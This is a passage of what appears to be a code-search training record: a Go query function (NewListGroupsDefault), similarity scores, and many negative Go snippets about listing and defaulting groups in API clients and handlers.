!= nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfSectionGroup\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}" ]
[ "0.63562137", "0.6228668", "0.6198471", "0.6065619", "0.58854806", "0.58265823", "0.5792491", "0.57695234", "0.57186234", "0.56959563", "0.5435722", "0.54346776", "0.5393077", "0.53348124", "0.5326011", "0.53110677", "0.5290318", "0.528526", "0.5273268", "0.52673376", "0.5266709", "0.52624816", "0.52567506", "0.5255441", "0.52532643", "0.52529013", "0.5250166", "0.5249367", "0.5234415", "0.52164394", "0.5213501", "0.51720965", "0.51354957", "0.5097718", "0.50818783", "0.50795865", "0.5073121", "0.50596106", "0.50434816", "0.503819", "0.50345486", "0.5031207", "0.5029554", "0.5021751", "0.50084037", "0.4996552", "0.49890736", "0.49870145", "0.49851552", "0.49815112", "0.49808022", "0.49801806", "0.49779123", "0.49741602", "0.49729225", "0.4964679", "0.49551782", "0.4953333", "0.49467587", "0.49411237", "0.49401936", "0.49375156", "0.49375156", "0.4929768", "0.4925819", "0.49210924", "0.49131843", "0.49045852", "0.48962298", "0.48938563", "0.48923892", "0.4887884", "0.48812434", "0.4876263", "0.48730245", "0.48672014", "0.48642623", "0.48627397", "0.48620582", "0.48572066", "0.4856331", "0.48513272", "0.48409277", "0.48353192", "0.4833705", "0.48313853", "0.4824129", "0.482099", "0.48162866", "0.48124015", "0.48102245", "0.48069453", "0.48012614", "0.47961485", "0.47958863", "0.47885495", "0.4788068", "0.47821927", "0.47704387", "0.47692686" ]
0.7558979
0
NewListGroupsDefault creates a ListGroupsDefault with default headers values
func NewListGroupsDefault(code int) *ListGroupsDefault { return &ListGroupsDefault{ _statusCode: code, } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewDefaultGroups(ctx *pulumi.Context,\n\tname string, args *DefaultGroupsArgs, opts ...pulumi.ResourceOption) (*DefaultGroups, error) {\n\tif args == nil || args.GroupIds == nil {\n\t\treturn nil, errors.New(\"missing required argument 'GroupIds'\")\n\t}\n\tif args == nil || args.RealmId == nil {\n\t\treturn nil, errors.New(\"missing required argument 'RealmId'\")\n\t}\n\tif args == nil {\n\t\targs = &DefaultGroupsArgs{}\n\t}\n\tvar resource DefaultGroups\n\terr := ctx.RegisterResource(\"keycloak:index/defaultGroups:DefaultGroups\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewGetHostGroupsDefault(code int) *GetHostGroupsDefault {\n\treturn &GetHostGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewPostVolumeGroupsListDefault(code int) *PostVolumeGroupsListDefault {\n\treturn &PostVolumeGroupsListDefault{\n\t\t_statusCode: code,\n\t}\n}", "func DefaultGroups(clusterName, addonName string) []string {\n\treturn []string{\n\t\tfmt.Sprintf(\"system:open-cluster-management:cluster:%s:addon:%s\", clusterName, addonName),\n\t\tfmt.Sprintf(\"system:open-cluster-management:addon:%s\", addonName),\n\t\t\"system:authenticated\",\n\t}\n}", "func NewUpdateHostGroupsDefault(code int) *UpdateHostGroupsDefault {\n\treturn &UpdateHostGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func GetDefaultGroups(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *DefaultGroupsState, opts ...pulumi.ResourceOption) (*DefaultGroups, error) {\n\tvar resource DefaultGroups\n\terr := ctx.ReadResource(\"keycloak:index/defaultGroups:DefaultGroups\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewDeleteCIDGroupsDefault(code int) *DeleteCIDGroupsDefault {\n\treturn &DeleteCIDGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (c *DefaultIdentityProvider) ListGroups(ctx context.Context, options *metainternal.ListOptions) (*auth.GroupList, error) {\n\tkeyword := \"\"\n\tlimit := 50\n\tif options.FieldSelector != nil {\n\t\tkeyword, _ = options.FieldSelector.RequiresExactMatch(auth.KeywordQueryTag)\n\t\tlimitStr, _ := options.FieldSelector.RequiresExactMatch(auth.QueryLimitTag)\n\t\tif li, err := strconv.Atoi(limitStr); err == nil && li > 0 {\n\t\t\tlimit = li\n\t\t}\n\t}\n\n\t_, tenantID := authentication.GetUsernameAndTenantID(ctx)\n\tif tenantID != \"\" && tenantID != c.tenantID {\n\t\treturn nil, apierrors.NewBadRequest(\"must in the same tenant\")\n\t}\n\n\tallList, err := c.localGroupLister.List(labels.Everything())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar localGroupList []*authv1.LocalGroup\n\tfor i, item := range allList {\n\t\tif item.Spec.TenantID == c.tenantID {\n\t\t\tlocalGroupList = append(localGroupList, allList[i])\n\t\t}\n\t}\n\n\tif keyword != \"\" {\n\t\tvar newList []*authv1.LocalGroup\n\t\tfor i, val := range localGroupList {\n\t\t\tif strings.Contains(val.Name, keyword) || strings.Contains(val.Spec.DisplayName, keyword) {\n\t\t\t\tnewList = append(newList, localGroupList[i])\n\t\t\t}\n\t\t}\n\t\tlocalGroupList = newList\n\t}\n\n\titems := localGroupList[0:min(len(localGroupList), limit)]\n\n\tgroupList := auth.GroupList{}\n\tfor _, item := range items {\n\t\tgroup := convertToGroup(item)\n\t\tgroupList.Items = append(groupList.Items, group)\n\t}\n\n\treturn &groupList, nil\n}", "func NewQueryUserGroupsDefault(code int) *QueryUserGroupsDefault {\n\treturn &QueryUserGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewDeleteUserGroupsDefault(code int) *DeleteUserGroupsDefault {\n\treturn &DeleteUserGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewDeleteAuthGroupsDefault(code int) *DeleteAuthGroupsDefault {\n\treturn &DeleteAuthGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewResonateUserListUsersUserGroupsDefault(code int) *ResonateUserListUsersUserGroupsDefault {\n\treturn &ResonateUserListUsersUserGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func DefaultDescribeGroupParser() *DelegatingParser {\n\treturn &DelegatingParser{\n\t\t[]DescribeGroupParser{\n\t\t\tkafka0_9_0_1DescribeGroupParser,\n\t\t\tkafka0_10_0_1DescribeGroupParser,\n\t\t\tkafka0_10_1DescribeGroupParser,\n\t\t\tkafka0_10_2_1DescribeGroupParser,\n\t\t},\n\t}\n}", "func NewListIdpGroupMappingsDefault(code int) *ListIdpGroupMappingsDefault {\n\treturn &ListIdpGroupMappingsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewListGroupsNotFound() *ListGroupsNotFound {\n\treturn &ListGroupsNotFound{}\n}", "func (o *SamlConfigurationProperties) SetDefaultGroups(v SamlConfigurationPropertyItemsArray) {\n\to.DefaultGroups = &v\n}", "func DefaultImportGroupsWithCurrent(current string) ImportsGrouper {\n\toncer.Do(initStdlibPackages)\n\treturn defaultImportGrouper(current)\n}", "func CreateDefaultGroup(db *gorp.DbMap, groupName string) error {\n\tquery := `SELECT id FROM \"group\" where name = $1`\n\tvar id int64\n\tif err := db.QueryRow(query, groupName).Scan(&id); err == sql.ErrNoRows {\n\t\tlog.Debug(\"CreateDefaultGroup> create %s group in DB\", groupName)\n\t\tquery = `INSERT INTO \"group\" (name) VALUES ($1)`\n\t\tif _, err := db.Exec(query, groupName); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func NewQueryCIDGroupsDefault(code int) *QueryCIDGroupsDefault {\n\treturn &QueryCIDGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewDefaultNodeGroupListProcessor() NodeGroupListProcessor {\n\treturn &NoOpNodeGroupListProcessor{}\n}", "func NewListGroupsOK() *ListGroupsOK {\n\treturn &ListGroupsOK{}\n}", "func (c *GroupController) List(ctx *app.ListGroupContext) error {\n\t// GroupController_List: start_implement\n\n\tdataStore := &dal.DataStore{}\n\tdataStore.GetSession()\n\t// Close the session\n\tdefer dataStore.Close()\n\tdc := dal.NewDalGroup(dataStore)\n\n\tgroups, err := dc.FetchAll()\n\n\tif err != nil {\n\t\tctx.ResponseData.Service.LogError(\"InternalServerError\", \"req_id\", middleware.ContextRequestID(ctx), \"ctrl\", \"Group\", \"action\", \"List\", ctx.RequestData.Request.Method, ctx.RequestData.Request.URL, \"databaseError\", err.Error())\n\t\treturn ctx.InternalServerError()\n\t}\n\n\tres := make(app.GwentapiGroupCollection, len(*groups))\n\n\tlastModified := time.Time{}\n\tfor i, group := range *groups {\n\t\tg, _ := factory.CreateGroup(&group)\n\n\t\tif lastModified.Before(group.Last_Modified) {\n\t\t\tlastModified = group.Last_Modified\n\t\t}\n\n\t\tres[i] = g\n\t}\n\n\t// GroupController_List: end_implement\n\thelpers.LastModified(ctx.ResponseData, lastModified)\n\tif ctx.IfModifiedSince != nil {\n\t\tif !helpers.IsModified(*ctx.IfModifiedSince, lastModified) {\n\t\t\treturn ctx.NotModified()\n\t\t}\n\t}\n\treturn ctx.OK(res)\n}", "func InitializeDefaultGroupName(db gorp.SqlExecutor, defaultGrpName string) error {\n\t//Load the famous sharedInfraGroup\n\tvar err error\n\tSharedInfraGroup, err = LoadByName(context.Background(), db, sdk.SharedInfraGroupName)\n\tif err != nil {\n\t\treturn sdk.WrapError(err, \"group.InitializeDefaultGroupName> Cannot load shared infra group\")\n\t}\n\n\tif defaultGrpName != \"\" {\n\t\tDefaultGroup, err = LoadByName(context.Background(), db, defaultGrpName)\n\t\tif err != nil {\n\t\t\treturn sdk.WrapError(err, \"group.InitializeDefaultGroupName> Cannot load %s group\", defaultGrpName)\n\t\t}\n\t}\n\n\treturn nil\n}", "func NewListOfDevicesDefault(code int) *ListOfDevicesDefault {\n\tif code <= 0 {\n\t\tcode = 500\n\t}\n\n\treturn &ListOfDevicesDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewListDashboardsDefault(code int) *ListDashboardsDefault {\n\treturn &ListDashboardsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewPostVolumeGroupBackupsListDefault(code int) *PostVolumeGroupBackupsListDefault {\n\treturn &PostVolumeGroupBackupsListDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewListGroupsBadRequest() *ListGroupsBadRequest {\n\treturn &ListGroupsBadRequest{}\n}", "func NewListNSGroupsParams() *ListNSGroupsParams {\n\tvar (\n\t\tpageSizeDefault = int64(1000)\n\t\tpopulateReferencesDefault = bool(false)\n\t)\n\treturn &ListNSGroupsParams{\n\t\tPageSize: &pageSizeDefault,\n\t\tPopulateReferences: &populateReferencesDefault,\n\n\t\ttimeout: cr.DefaultTimeout,\n\t}\n}", "func NewTenancyContactGroupsCreateDefault(code int) *TenancyContactGroupsCreateDefault {\n\treturn &TenancyContactGroupsCreateDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewListGroupnetSubnetsDefault(code int) *ListGroupnetSubnetsDefault {\n\treturn &ListGroupnetSubnetsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (o *SamlConfigurationProperties) GetDefaultGroups() SamlConfigurationPropertyItemsArray {\n\tif o == nil || o.DefaultGroups == nil {\n\t\tvar ret SamlConfigurationPropertyItemsArray\n\t\treturn ret\n\t}\n\treturn *o.DefaultGroups\n}", "func (gc *GroupCreate) defaults() {\n\tif _, ok := gc.mutation.CreatedAt(); !ok {\n\t\tv := group.DefaultCreatedAt()\n\t\tgc.mutation.SetCreatedAt(v)\n\t}\n\tif _, ok := gc.mutation.UpdatedAt(); !ok {\n\t\tv := group.DefaultUpdatedAt()\n\t\tgc.mutation.SetUpdatedAt(v)\n\t}\n}", "func NewListComponentVersionsDefault(code int) *ListComponentVersionsDefault {\n\treturn &ListComponentVersionsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (rm *resourceManager) newListRequestPayload(\n\tr *resource,\n) (*svcsdk.DescribeReplicationGroupsInput, error) {\n\tres := &svcsdk.DescribeReplicationGroupsInput{}\n\n\tif r.ko.Spec.ReplicationGroupID != nil {\n\t\tres.SetReplicationGroupId(*r.ko.Spec.ReplicationGroupID)\n\t}\n\n\treturn res, nil\n}", "func (me *XsdGoPkgHasElem_DefaultResponseGroupssequenceTxsdOperationInformationOperationInformationschema_DefaultResponseGroups_TxsdOperationInformationSequenceDefaultResponseGroups_) Walk() (err error) {\n\tif fn := WalkHandlers.XsdGoPkgHasElem_DefaultResponseGroupssequenceTxsdOperationInformationOperationInformationschema_DefaultResponseGroups_TxsdOperationInformationSequenceDefaultResponseGroups_; me != nil {\n\t\tif fn != nil {\n\t\t\tif err = fn(me, true); xsdt.OnWalkError(&err, &WalkErrors, WalkContinueOnError, WalkOnError) {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tif err = me.DefaultResponseGroups.Walk(); xsdt.OnWalkError(&err, &WalkErrors, WalkContinueOnError, WalkOnError) {\n\t\t\treturn\n\t\t}\n\t\tif fn != nil {\n\t\t\tif err = fn(me, false); xsdt.OnWalkError(&err, &WalkErrors, WalkContinueOnError, WalkOnError) {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\treturn\n}", "func NewListGCPNetworksNoCredentialsDefault(code int) *ListGCPNetworksNoCredentialsDefault {\n\treturn &ListGCPNetworksNoCredentialsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func ListUserGroup(w http.ResponseWriter, r *http.Request) {\n\tfLog := userMgmtLogger.WithField(\"func\", \"ListUserGroup\").WithField(\"RequestID\", r.Context().Value(constants.RequestID)).WithField(\"path\", r.URL.Path).WithField(\"method\", r.Method)\n\n\tiauthctx := r.Context().Value(constants.HansipAuthentication)\n\tif iauthctx == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusUnauthorized, \"You are not authorized to access this resource\", nil, nil)\n\t\treturn\n\t}\n\n\tparams, err := helper.ParsePathParams(fmt.Sprintf(\"%s/management/user/{userRecId}/groups\", apiPrefix), r.URL.Path)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tuser, err := UserRepo.GetUserByRecID(r.Context(), params[\"userRecId\"])\n\tif err != nil {\n\t\tfLog.Errorf(\"UserRepo.GetUserByRecID got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusInternalServerError, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tif user == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusNotFound, fmt.Sprintf(\"User recid %s not found\", params[\"userRecId\"]), nil, nil)\n\t\treturn\n\t}\n\n\tpageRequest, err := helper.NewPageRequestFromRequest(r)\n\tif err != nil {\n\t\tfLog.Errorf(\"helper.NewPageRequestFromRequest got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusBadRequest, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tgroups, page, err := UserGroupRepo.ListUserGroupByUser(r.Context(), user, pageRequest)\n\tif err != nil {\n\t\tfLog.Errorf(\"UserGroupRepo.ListUserGroupByUser got %s\", err.Error())\n\t}\n\tsgroups := make([]*SimpleGroup, len(groups))\n\tfor k, v := range groups {\n\t\tsgroups[k] = &SimpleGroup{\n\t\t\tRecID: v.RecID,\n\t\t\tGroupName: v.GroupName,\n\t\t}\n\t}\n\tret := make(map[string]interface{})\n\tret[\"groups\"] = sgroups\n\tret[\"page\"] = page\n\thelper.WriteHTTPResponse(r.Context(), w, http.StatusOK, \"List of groups paginated\", nil, ret)\n}", "func (me *XsdGoPkgHasElems_DefaultResponseGroupssequenceTxsdOperationInformationOperationInformationschema_DefaultResponseGroups_TxsdOperationInformationSequenceDefaultResponseGroups_) Walk() (err error) {\n\tif fn := WalkHandlers.XsdGoPkgHasElems_DefaultResponseGroupssequenceTxsdOperationInformationOperationInformationschema_DefaultResponseGroups_TxsdOperationInformationSequenceDefaultResponseGroups_; me != nil {\n\t\tif fn != nil {\n\t\t\tif err = fn(me, true); xsdt.OnWalkError(&err, &WalkErrors, WalkContinueOnError, WalkOnError) {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tfor _, x := range me.DefaultResponseGroupses {\n\t\t\tif err = x.Walk(); xsdt.OnWalkError(&err, &WalkErrors, WalkContinueOnError, WalkOnError) {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tif fn != nil {\n\t\t\tif err = fn(me, false); xsdt.OnWalkError(&err, &WalkErrors, WalkContinueOnError, WalkOnError) {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\treturn\n}", "func (o SparseCloudSnapshotAccountsList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func (client WorkloadNetworksClient) ListVMGroupsPreparer(ctx context.Context, resourceGroupName string, privateCloudName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"privateCloudName\": autorest.Encode(\"path\", privateCloudName),\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2020-07-17-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AVS/privateClouds/{privateCloudName}/workloadNetworks/default/vmGroups\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func (o *SamlConfigurationProperties) GetDefaultGroupsOk() (*SamlConfigurationPropertyItemsArray, bool) {\n\tif o == nil || o.DefaultGroups == nil {\n\t\treturn nil, false\n\t}\n\treturn o.DefaultGroups, true\n}", "func List(c messagebird.Client, options *messagebird.PaginationRequest) (*Groups, error) {\n\tgroupList := &Groups{}\n\tif err := c.Request(groupList, http.MethodGet, path+\"?\"+options.QueryParams(), nil); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn groupList, nil\n}", "func (l *GroupLookup) newKeyGroup(entries []groupKeyListElement) *groupKeyList {\n\tid := l.nextID\n\tl.nextID++\n\treturn &groupKeyList{\n\t\tid: id,\n\t\telements: entries,\n\t}\n}", "func (a *HyperflexApiService) GetHyperflexInitiatorGroupList(ctx context.Context) ApiGetHyperflexInitiatorGroupListRequest {\n\treturn ApiGetHyperflexInitiatorGroupListRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t}\n}", "func (o SparseAPIChecksList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func NewDeleteIamLdapGroupsMoidDefault(code int) *DeleteIamLdapGroupsMoidDefault {\n\treturn &DeleteIamLdapGroupsMoidDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (o SparseClaimsList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func newRouteGroups(c *ZalandoV1Client, namespace string) *routeGroups {\n\treturn &routeGroups{\n\t\tclient: c.RESTClient(),\n\t\tns: namespace,\n\t}\n}", "func NewGetSystemObjectDefinitionsByIDAttributeGroupsDefault(code int) *GetSystemObjectDefinitionsByIDAttributeGroupsDefault {\n\treturn &GetSystemObjectDefinitionsByIDAttributeGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewGroups(filename string, bad BadLineHandler) (*HTGroup, error) {\n\thtGroup := HTGroup{\n\t\tfilePath: filename,\n\t}\n\treturn &htGroup, htGroup.ReloadGroups(bad)\n}", "func NewListUsersDefault(code int) *ListUsersDefault {\n\tif code <= 0 {\n\t\tcode = 500\n\t}\n\n\treturn &ListUsersDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (o SparseOAUTHKeysList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func (ss SectionSlice) Defaults() DefaultMap {\n\tvar dm = make(DefaultMap)\n\tfor _, s := range ss {\n\t\tfor _, g := range s.Groups {\n\t\t\tfor _, f := range g.Fields {\n\t\t\t\tdm[ScopeKey(Path(s.ID, g.ID, f.ID))] = f.Default\n\t\t\t}\n\t\t}\n\t}\n\treturn dm\n}", "func (ggSession *GreengrassSession) ListGroup(name string) error {\n\tvar id string\n\n\tif name != \"\" {\n\t\tlistOutput, err := ggSession.greengrass.ListGroups(&greengrass.ListGroupsInput{})\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfor _, v := range listOutput.Groups {\n\t\t\tif name == *v.Name {\n\t\t\t\tid = *v.Id\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif id == \"\" {\n\t\t\treturn fmt.Errorf(\"group %s not found\", name)\n\t\t}\n\t} else {\n\t\tid = ggSession.config.Group.ID\n\t}\n\n\tgroup, err := ggSession.greengrass.GetGroup(&greengrass.GetGroupInput{\n\t\tGroupId: &id,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group: %v\\n\", group)\n\n\tif group.LatestVersion == nil {\n\t\treturn nil\n\t}\n\n\tgroupVersion, err := ggSession.greengrass.GetGroupVersion(&greengrass.GetGroupVersionInput{\n\t\tGroupId: group.Id,\n\t\tGroupVersionId: group.LatestVersion,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group version: %v\\n\", groupVersion)\n\n\treturn nil\n}", "func NewListProviderPresetsDefault(code int) *ListProviderPresetsDefault {\n\treturn &ListProviderPresetsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewTemplateDefault() *gomol.Template {\n\ttpl, _ := gomol.NewTemplate(\"[{{color}}{{ucase .LevelName}}{{reset}}] {{.Message}}\")\n\treturn tpl\n}", "func (s *EmptyStore) GroupList() (groups []*storagepb.Group, err error) {\n\treturn groups, nil\n}", "func (o ClaimsList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func NewGetCustomObjectDefinitionsByIDAttributeGroupsByIDDefault(code int) *GetCustomObjectDefinitionsByIDAttributeGroupsByIDDefault {\n\treturn &GetCustomObjectDefinitionsByIDAttributeGroupsByIDDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (o SparseEnforcerReportsList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func (o APIChecksList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func CreateListServerGroupsRequest() (request *ListServerGroupsRequest) {\n\trequest = &ListServerGroupsRequest{\n\t\tRpcRequest: &requests.RpcRequest{},\n\t}\n\trequest.InitWithApiInfo(\"Alb\", \"2020-06-16\", \"ListServerGroups\", \"alb\", \"openAPI\")\n\trequest.Method = requests.POST\n\treturn\n}", "func NewListNSGroupsParamsWithHTTPClient(client *http.Client) *ListNSGroupsParams {\n\tvar (\n\t\tpageSizeDefault = int64(1000)\n\t\tpopulateReferencesDefault = bool(false)\n\t)\n\treturn &ListNSGroupsParams{\n\t\tPageSize: &pageSizeDefault,\n\t\tPopulateReferences: &populateReferencesDefault,\n\t\tHTTPClient: client,\n\t}\n}", "func NewGetUserGroupMembersByIDDefault(code int) *GetUserGroupMembersByIDDefault {\n\treturn &GetUserGroupMembersByIDDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (o SparseAccessibleNamespacesList) DefaultOrder() []string {\n\n\treturn []string{\n\t\t\"name\",\n\t}\n}", "func (s *GroupsService) List(opt ...CallOption) ([]*Group, *Response, error) {\n\tgroups, resp, err := listGroup(s.client, \"groups\", opt...)\n\n\treturn groups, resp, err\n}", "func (o AccessibleNamespacesList) DefaultOrder() []string {\n\n\treturn []string{\n\t\t\"name\",\n\t}\n}", "func NewGroup(dataframe *DataFrame, columns ...string) *Groups {\n\t// ret := &Groups{Columns: []string{}, Grouper: columns, Group: make(map[types.C][]indices.Index), Df: dataframe}\n\tret := &Groups{Keys: []Keys{}, Columns: []string{}, Grouper: columns, Group: make(map[types.C][]indices.Index), Df: dataframe}\n\n\treturn ret\n}", "func (o EnforcerReportsList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func (o *SamlConfigurationProperties) HasDefaultGroups() bool {\n\tif o != nil && o.DefaultGroups != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (client IdentityClient) ListGroups(ctx context.Context, request ListGroupsRequest) (response ListGroupsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.listGroups, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = ListGroupsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = ListGroupsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(ListGroupsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into ListGroupsResponse\")\n\t}\n\treturn\n}", "func NewWafGetPolicyGroupsResponseWithDefaults() *WafGetPolicyGroupsResponse {\n\tthis := WafGetPolicyGroupsResponse{}\n\treturn &this\n}", "func NewPatchDeviceGroupPropertyByNameDefault(code int) *PatchDeviceGroupPropertyByNameDefault {\n\treturn &PatchDeviceGroupPropertyByNameDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (r *defaultReview) Groups() []string {\n\treturn r.groups\n}", "func NewDefaultColLevel(n int, name string) ColLevel {\n\tcolsInt := values.MakeStringRange(0, n)\n\tlvl := ColLevel{Labels: colsInt, DataType: options.Int64, Name: name, IsDefault: true}\n\tlvl.Refresh()\n\treturn lvl\n}", "func (c *tiKVGroups) List(opts v1.ListOptions) (result *v1alpha1.TiKVGroupList, err error) {\n\tvar timeout time.Duration\n\tif opts.TimeoutSeconds != nil {\n\t\ttimeout = time.Duration(*opts.TimeoutSeconds) * time.Second\n\t}\n\tresult = &v1alpha1.TiKVGroupList{}\n\terr = c.client.Get().\n\t\tNamespace(c.ns).\n\t\tResource(\"tikvgroups\").\n\t\tVersionedParams(&opts, scheme.ParameterCodec).\n\t\tTimeout(timeout).\n\t\tDo().\n\t\tInto(result)\n\treturn\n}", "func NewDeleteRuleGroupsMixin0Default(code int) *DeleteRuleGroupsMixin0Default {\n\treturn &DeleteRuleGroupsMixin0Default{\n\t\t_statusCode: code,\n\t}\n}", "func (s *GroupsService) List(ctx context.Context, opts *PagingOptions) (*GroupList, error) {\n\tquery := addPaging(url.Values{}, opts)\n\treq, err := s.Client.NewRequest(ctx, http.MethodGet, newURI(groupsURI), WithQuery(query))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed: , %w\", err)\n\t}\n\tres, resp, err := s.Client.Do(req)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed: , %w\", err)\n\t}\n\n\tif resp != nil && resp.StatusCode == http.StatusNotFound {\n\t\treturn nil, ErrNotFound\n\t}\n\n\tg := &GroupList{\n\t\tGroups: []*Group{},\n\t}\n\tif err := json.Unmarshal(res, g); err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed, unable to unmarshal repository list json: , %w\", err)\n\t}\n\n\tfor _, r := range g.GetGroups() {\n\t\tr.Session.set(resp)\n\t}\n\n\treturn g, nil\n}", "func (o SparseRenderTemplatesList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func (o CloudSnapshotAccountsList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func getGroups(w http.ResponseWriter, r *http.Request) {\n InitResponse(&w)\n if r.Method == \"OPTIONS\" {return}\n\n allow, _ := HasPermission(&w, 